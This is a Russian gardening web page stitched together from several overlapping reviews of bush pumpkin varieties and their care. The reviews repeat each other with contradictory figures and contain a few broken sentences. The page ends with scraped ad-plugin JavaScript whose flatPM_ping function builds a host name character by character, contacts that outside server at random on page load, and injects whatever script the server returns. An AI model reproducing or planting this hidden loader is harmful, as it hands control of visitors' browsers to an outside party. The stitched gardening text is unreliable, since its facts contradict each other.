На заметку! В Италии тыквенный суп-пюре готовят с добавлением сыра и вина, а на Гаити такое блюдо неотъемлемым элементов на праздничном столе. В Австралии суп делают очень густым и добавляют в него большое количество специй, а в Афганистане готовят молочный суп с тыквой под названием «ширкавак».

Преимущества и недостатки сорта

Сорт Амазонка один из самых простых в уходе, он не требует формирования и прищипывания верхушки. Уход заключается лишь в своевременных поливах и подкормках. Тыква дает хорошую и стабильную урожайность, отличается высоким иммунитетом, имеет высокие вкусовые качества. Также Амазонка прекрасно хранится и транспортируется.

Существенных недостатков сорт не имеет, лишь изредка заболевает и нуждается в лечении.

Отзывы фермеров

О сорте Амазонка говорят разное. Иногда дачники довольны урожаем, а иногда наоборот, разочаровываются. Что же говорят о сорте российский дачники?

Павел, г. Москва: «Выращиваю сорт Амазонка уже давно, и каждый год он радует меня отличным урожаем. Тыковки компактные, аккуратные, удобны в готовке. Да и в уходе проще сорта не придумаешь, что очень нравится. Готовлю тыквенный сок или запекаю в духовке».

Дмитрий, г. Курган: «Посадил тыкву Амазонка на грядках после томатов 7 мая. Высаживал рассадой, с середины мая начал поливать грядки дождевой водой. В целом сорт неплохой и по вкусу, и по внешним качествам».

Зина, г. Оренбург: «О сорте Амазонка слышала много противоречивых отзывов, решила сама проверить и посадила семена в прошлом году. Плоды завязались дружно, однако максимальный вес одного всего 900 г. Сроки хранения оказались маленькими, уже через месяц собранные овощи начали портиться».

Заключение

Сорт Амазонка отлично подходит тем дачникам, которые еще не имеют опыта выращивания тыквы. Элементарный уход позволяет при минимальных усилиях получить максимум урожая. Маленькие овощи долго хранятся, поэтому зачастую их выращивают не только для личного потребления, но и для продажи.

Амазонка прекрасно дополнит и утренний завтрак, и мясо на обед, а также послужит основой для вечернего сладкого пирога.

Описание популярных сортов кустовой тыквы, их выращивание и урожайность

Привычное представление о тыкве — длинные плети, которые, если их вовремя не прищипнуть, расползаются по огороду, а иногда и к соседям норовят пробраться через щель в заборе. Тыква кустовая отличается от плетистой компактными кустами и отсутствием длинных побегов. При этом урожайность не страдает. Все современные сорта кустового типа имеют хорошие характеристики.

Особенности кустовой тыквы и ее преимущества

Выбор сортов тыквы кустовой большой, у каждого свои особенности выращивания, но есть общие моменты, характерные для культуры этого вида. Компактные кусты позволяют высаживать кустовую разновидность на небольших дачных участках. При желании ее можно садить в саду, используя как элемент ландшафтного дизайна.

Кусты декоративны в момент цветения и в период плодоношения, а темно-зеленые листья смотрятся нарядно на протяжении всего сезона. Стебли у растения прямостоячие, плети отсутствуют, плоды формируются у самого основания.

Преимущества кустовой тыквы:

  • не нужно формировать куст;
  • занимает мало места;
  • густая листва защищает почву от высыхания;
  • урожайность.

О главном достоинстве кустового вида — скороспелости стоит поговорить отдельно. У каждого сорта свой срок созревания, но в среднем все они достигают биологической спелости за 85–100 дней. При этом плоды обладают отменным вкусом и ароматом. У большей части сортов мякоть ярко-оранжевая, содержит большой процент каротина и других полезных микроэлементов.

Обзор и характеристика наиболее популярных сортов кустовой тыквы

Огородники не торопятся с посадкой тыквенных семян в открытый грунт, ждут хорошего прогревания почвы. Есть время, чтобы подобрать наиболее удачный сорт, а, точнее, сорта. Для этого нужно проанализировать все основные характеристики культуры:

  • сроки созревания;
  • форму и размер плодов;
  • вкус и толщину мякоти;
  • лежкость;
  • транспортабельность;
  • урожайность.

Улыбка

Описание тыквы Улыбка состоит из одних достоинств, поэтому многие дачники выбирают именно этот сорт. У сорта Улыбка на высоте основные характеристики:

  • урожайность (280 ц/га);
  • холодостойкость;
  • скороспелость (85 дней).

Для нашего короткого лета с неустойчивой погодой они подходят идеально. К концу лета на невысоких, компактных кустах успевают созреть порционные плоды (до 7 штук на одном кусту) весом от 800 г до 1200 г.

Плоды шаровидной формы, слабо сплюснутые, поверхность гладкая или слабосегментированная. Мякоть ярко-оранжевого цвета, сладкая, не отличается сочностью, по толщине средняя. Кожура оранжевая, на ней можно заметить малозаметные белые полосы. Семян в плодах мало. Достоинства: засухоустойчивая, транспортабельная, лежкая, дает хорошие урожаи при недостатке тепла, хороший вкус, возможность выращивания на всей территории РФ.

Лечебная

Кустовая тыква, относящаяся к раннеспелым сортам. Растение имеет столовое назначение, формирует сплюснутые, слабосегментированные плоды, покрытые светло-серой кожурой с темно-серым рисунком в виде сетки. Кора легко режется, мякоть на срезе ярко-оранжевая, средней толщины. Вкусовые характеристики мякоти:

  • хрустящая;
  • с большим содержанием сока;
  • нежная;
  • вкусная;
  • сочная.

Главные достоинства тыквы Лечебная: урожайность 42,1 т/га, длительное хранение, транспортабельность. Есть недостаток – слабый иммунитет. Растению требуется профилактика:

  • мучнистой росы;
  • антракноза;
  • гнилей (серой, белой).

Выращивать тыкву сорта Лечебная можно в Средней полосе РФ на Урале и в Сибири.

Жемчужина

Жемчужина — мускатная разновидность тыквы. Получить богатый урожай можно в короткие сроки. Выращивание кустовой тыквы Жемчужина длится около 100 дней. Вырастить крупные плоды весом до 7 кг несложно. Каждый куст выпускает по 6 побегов, на каждом из которых оставляют по одной завязи. Форма плодов цилиндрическая, длина 50 см.

Кожура оранжевая с легким налетом сизого оттенка. При хранении вкус темно-оранжевой мякоти становится более интенсивным. В ее составе много углеводов, витаминов, каротина и микроэлементов. Ценные качества мякоти:

Сорт ценят за высокую урожайность — 504 ц/га, засухоустойчивость, отличный вкус.

Кустовая оранжевая

Оранжевая тыква может храниться почти до Нового года, хотя сорт раннеспелый. Первые плоды созревают через 95–100 дней после всходов. Тыкву кустовую оранжевую успешно выращивают в Сибири, она не боится резких изменений погоды. В апреле, сажая рассаду тыквы кустовой оранжевой под укрывной материал, через 3 месяца получают ранний урожай круглых плодов весом до 5 кг. Посадка и уход за ней стандартный:

  • умеренный полив;
  • прополка;
  • рыхление или мульчирование междурядий.

Мякоть и шкурка оранжевые, сахаристость низкая, поэтому используют этот сорт для приготовления супов пюре, рагу, зимних заготовок и заморозки.

Стофунтовая

Созревание плодов происходит в средние сроки за 112–138 дней со времени появления всходов. Спелые плоды тыквы оранжевые и весят меньше 40 кг. Есть маленькое несоответствие названия с реальной массой плодов, небольшие тыквы весят 10 кг, крупные — 20 кг. Это мало влияет на популярность сорта, с каждым годом она только растет.

Плоды могут быть разной формы (шаровидной, овальной) с массой, зависящей от погодных условий и плодородия почвы. Мякоть у них очень сочная, ее используют для приготовления каш, пюре, едят в свежем виде. Этот сорт лучше развивается и плодоносит, если погода умеренно теплая.

Амазонка

Созревания плодов ждать недолго, они достигают технической спелости через 90 дней после появления всходов. Кусты Амазонки компактные. Плоды имеют красивую, плоскую форму с массой от 1 до 2 кг. Окраска кожуры и мякоти темно-оранжевая. Вкусовые качества плодов высокие, мякоть у них очень сочная, хрустящая, сладкая.
Достоинства сорта:

  • товарный вид;
  • отличный вкус;
  • хорошо хранится;
  • созревает рано.

Грибовская

Один из старых кустовых сортов тыквы Грибовская 189, его не нужно путать с другой замечательной тыквой Грибовской зимней. Кустовая разновидность популярна у сибирских и уральских дачников. Формой плоды напоминают кабачки, они продолговатые, зауженные с одного конца. Масса плодов 3–5 кг, с квадратного метра можно получить до 8 кг.

По мере развития у тыквы изменяется цвет кожуры. У молодых тыквин она зеленая с темными полосками, у спелых оранжевая с теми же зелеными полосками. Мякоть оранжевого цвета, очень плотная и вкусная. По срокам созревания сорт ранний, плоды созревают через 80 дней после всходов. Сорванные зелеными, они дозревают во время хранения.

Тыквенные заболевания обходят стороной тыкву Грибовскую зимнюю. Этот сорт любит тепло, формирует шаровидные плоды серого цвета весом до 4 кг. Они могут храниться в течение всей зимы. Толщина (5 см) и ярко-оранжевый цвет мякоти поражают. На высоте ее вкус и содержание питательных веществ. В мякоти Грибовской зимней есть и витамин C, и большое количество каротина.

Урожайность сорта Грибовская зимняя — 24,1 т/га. По срокам созревания сорт позднеспелый – от всходов до уборки проходит не менее 140 дней.

Руж Виф Дэтамп

Эту экзотичную культуру на дачном участке выращивать несложно. Сорт французской селекции нашел своих любителей среди российских дачников. Руж Виф Дэтамп входит в десятку популярных сортов тыквы кустового типа. Выращивать ее несложно, кусты невысокие, а плоды формируются крупные, весом до 10 кг.

Кожура розово-красная, мякоть светло-оранжевая, сочная, умеренно сладкая, из нее получается отличный сок. Хранятся плоды недолго, крайний срок — середина декабря. Многие дачники хвалят этот сорт за урожайность, но критикуют за средний вкус и аромат.

Уход за кустовой тыквой

Особенностей выращивания кустовой тыквы нет. Посадка и уход за этой разновидностью мало отличаются от ухода за плетистыми тыквами. Единственное важное отличие – способ формирования кустов. При выборе места учитывают достаточную освещенность участка и отсутствие сквозняков.

Почву при необходимости раскисляют, внося мел или доломитовую муку. В суглинистый и глинистый грунт добавляют песок, торф для улучшения его структуры. Корневая система лучше развивается в рыхлых, водопроницаемых почвах. Плодородие повышают, внося под перекопку:

  • компост;
  • перегной;
  • минеральные удобрения (суперфосфат, калийную селитру).

Используют два способа посадки тыквы: семенами в грунт, рассадой. Возраст готовой для высадки в открытый грунт рассады — 25 дней. В открытый грунт семена сеют в хорошо прогретую почву. Сроки посадки:

  • средняя полоса РФ — середина мая;
  • Урал, Сибирь — конец мая, начало июня.

Главный ориентир для посадки — текущий прогноз погоды. Тыква любит тепло и торопиться с посадкой не стоит, если есть угроза возвратных заморозков. При ранней посадке от заморозков тыкву спасает укрывной материал. Стандартная схема посадки для кустовых сортов тыквы 60х60 см.

Кустовая тыква любит, когда ее регулярно поливают теплой водой. Кратковременную засуху она переносит без большого ущерба, но длительная засуха может значительно уменьшить урожай тыквы. Метод дождевания не подходит для этой культуры. При поливе не нужно поливать листья, плоды и цветы. Вся вода должна попадать в лунку, сформированную вокруг центрального побега.

Тыква хорошо реагирует на подкормки. Увлекаться ими не стоит, достаточно подкормить ее азотным удобрением в начальный период, когда активно нарастает зеленая масса и фосфорно-калийными препаратами во время формирования плодов.

Кусты обычно не формируют, но после завязывания первого плода прищипывают макушку у главного побега. При большом количестве листьев часть удаляют, чтобы плоды больше получали солнечного света. В августе (10–15 числа) прищипывают все точки роста. Это необходимо сделать, чтобы все завязавшиеся плоды успели вызреть до наступления холодов.

О готовности плода к уборке судят по плодоножке и цвету кожуры. Плодоножка сохнет, а кожура приобретает соответствующий данному сорту цвет. Если ожидаются заморозки на почве, все плоды убирают, подмерзшие тыквы плохо хранятся. По возможности уборку урожая проводят в сухую и солнечную погоду. Плоды, собранные в дождь, сушат под навесом в течение нескольких дней.

Кустовая тыква — обзор самых популярных сортов и их особенностей

Многие огородники, получившие опыт выращивания тыквы, в дальнейшем не отказывают себе в удовольствии посадить несколько видов, сортов «солнечного» овоща. Тыква является неприхотливой, урожайной культурой, минусом которой некоторые дачники считают способность в период роста занимать большую площадь. Так рассуждают лишь те, кто не знает о существовании подвида — кустовой тыквы, представляющей собой растение с небольшими по длине, компактно растущими плетями.

Особенности кустовой тыквы и ее преимущества

Для посадки на небольшом приусадебном участке тыква кустовая лучшие сорта подойдёт идеально. Ей не требуется много места на грядке. Огороднику, посадившему культуру, не понадобится заниматься формированием растений, обрезая лишние плети, укорачивая побеги. У кустовой тыквы плоды формируются у основания. Её побеги, стебель — прямостоячие, что обеспечивает лучшее сохранение влаги под кустом, положительно влияет на урожайность.

Главным преимуществом тыквы кустовой считается скороспелость, что выгодно её отличает от плетистой «родственницы». Например, тыква Грибовская созревает через 70 дней. Для полного созревания плодов кустового растения требуется, в среднем, 85 — 100 дней. Красивые плоды данного подвида «солнечного овоща» характеризуются отменными вкусовыми качествами. Мякоть большинства сортов ярко-оранжевая, сочная, чрезвычайно нежная, сладкая, богатая каротином.

Размеры плодов культуры относительно небольшие. Масса овощей, в основном, находится в пределах 0,6 — 3 кг. С одного куста можно получить урожай в количестве 4 — 15 штук. Такие плоды называют порционными. Сорвав с грядки, их очень удобно сразу же задействовать для приготовления различных блюд, употребить в сыром виде без боязни оставить неиспользованные куски. Тем не менее, вес плодов некоторых сортов может достигать 4 — 6 кг и более.

Как уже было сказано выше, кустовая тыква не нуждается в выделении грядки большой площади. Оптимальной считается схема посадки культуры: 60 х 60 либо 70 х 70 см.

Кустовые тыквенные сорта для Подмосковья демонстрируют устойчивость к холоду, нетребовательность в уходе, выращивание происходит без проблем.

Обзор и характеристика наиболее популярных сортов кустовой тыквы

Современным селекционерам удалось вывести немало замечательных сортов этой разновидности тыквы. Ниже приведены наиболее удачные сорта кустовой тыквы, пользующиеся популярностью у огородников — наших соотечественников.

Сорт тыквы Улыбка

Кустовая тыква Улыбка нравится многим дачникам по причине скороспелости. Созревание плодов культуры происходит в кратчайшие сроки (85 дней). На растении образуются короткие побеги (до 6 шт.). Давая отзывы о тыкве Улыбка, огородники отмечают способность культуры стойко переносить весенние похолодания.

Вес спелых плодов составляет 1 — 2 кг. Цвет овощей ярко-оранжевый, их форма округлая, несколько приплюснутая, поверхность может быть гладкой либо слабо сегментированной. Сладкая, хрустящая плодовая мякоть имеет насыщенно оранжевый окрас, приятный дынный аромат. Сорт славится своими замечательными вкусовыми, диетическими качествами, отличной транспортабельностью.

Сорт тыквы Лечебная

Раннеспелая тыква Лечебная представляет собой компактное растение, обладающее стойкостью к колебаниям температур. Для полного созревания плодов необходимо до 105 дней. Плоды культуры порадуют хорошей транспортабельностью, сохранностью в течение длительного периода (до мая). Культура выращивается в условиях открытого грунта.

Плоды тыквы сорта Лечебная имеют округло-сплюснутую форму, слабо сегментированную поверхность, весят 3 — 5,5 кг. Расцветка тонкой, кожистой кожуры светло-серая с эффектными прерывистыми небольшими полосками. Сочная, толстая, хрустящая мякоть обладает светло-оранжевой окраской, сладким вкусом.

Сорт тыквы Жемчужина

Вкусная тыква Жемчужина превосходно чувствует себя в условиях открытого грунта в наших широтах. Для полного созревания плодов культуры требуется 100 — 110 суток. Урожайность сорта достаточно солидная: 15 кг / м.кв. Огородники, публикующие отзывы о тыкве Жемчужина, отмечают,что семена очень маленькие.

Сортовые плоды имеют узнаваемую удлинённо-цилиндрическую форму, желтовато-оранжевый цвет, гладкую поверхность, весят до 7, 5 кг. Толстой мякоти овоща присуща красновато-оранжевая окраска. Вкусовые качества мякоти отличные: она нежная, сладкая, сочная. Плоды без проблем перевозятся на дальние расстояния, хорошо хранятся.

Сорт тыквы Кустовая оранжевая

Урожайная тыква Кустовая оранжевая созревает на 95 — 105 день с момента проклёвывания ростков. Плоды культуры отлично сохраняются в зимний период. Данный сорт считается гордостью российской селекции. Неприхотливые, компактные сортовые кусты можно выращивать на грядках в регионах с переменчивыми климатическими условиями.

Плоды растения пригодны для универсального применения, имеют округлую либо слегка цилиндрическую форму, весят до 5 кг. Тыквенная кожура тонкая, однотонная, её структура кожистая. Сочная мякоть обладает жёлтым окрасом, характеризуется повышенным содержанием каротина.

Сорт тыквы Стофунтовая

Культура демонстрирует стойкость к бактериозу, мучнистой росе, гнили. Плоды наделены шаровидной формой, гладкой, слабосегментированной поверхностью. Тонкая кора овощей имеет жёлто-оранжевый окрас. Мякоть обладает рыхлой структурой, кремово-жёлтой расцветкой, считается не очень сладкой. Показатели урожайности сорта доходят до 6,3 кг / м.кв.

Сорт тыквы Амазонка

Среднеранняя тыква Амазонка представляет собой чрезвычайно компактное растение. На созревание урожая можно рассчитывать в период 90 — 110 дней с момента появления всходов. Красивые плоды культуры имеют плоскую форму, тёмно-оранжевую кожуру, весят 1 — 2 кг. Расцветка сладкой, хрустящей мякоти насыщенно-оранжевая. Сохранность, вкусовые, товарные качества овощей весьма высокие.

Сорт тыквы Руж Виф ДЭтамп

Среднеспелая тыква Руж Виф ДЭтамп выбирается огородниками по причине отличной сохранности крупных плодов, богатых картином, так же, как и у сорта Золотая семечка. Из овощей готовятся превосходные пюре, соки. Сорт обладает стойкостью к пероноспорозу, листовой мозаике, мучнистой росе. Плоды культуры красно-оранжевые, их форма сплюснутая, поверхность сегментирования. Расцветка плотной мякоти оранжевая, её вкусовые качества прекрасные.

Отдав предпочтение посадке нескольких сортов кустовой тыквы на участке, можно получить разнообразные по форме, расцветке вкусные плоды, с помощью которых возможно удачно разнообразить рацион домочадцев. Кроме того, кустовая разновидность «солнечного овоща» для Сибири способна придать огороду особенный колорит, радовать глаз своей красотой весь сезон. Также читайте статью: Пригодна ли в пищу декоративная тыква?

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};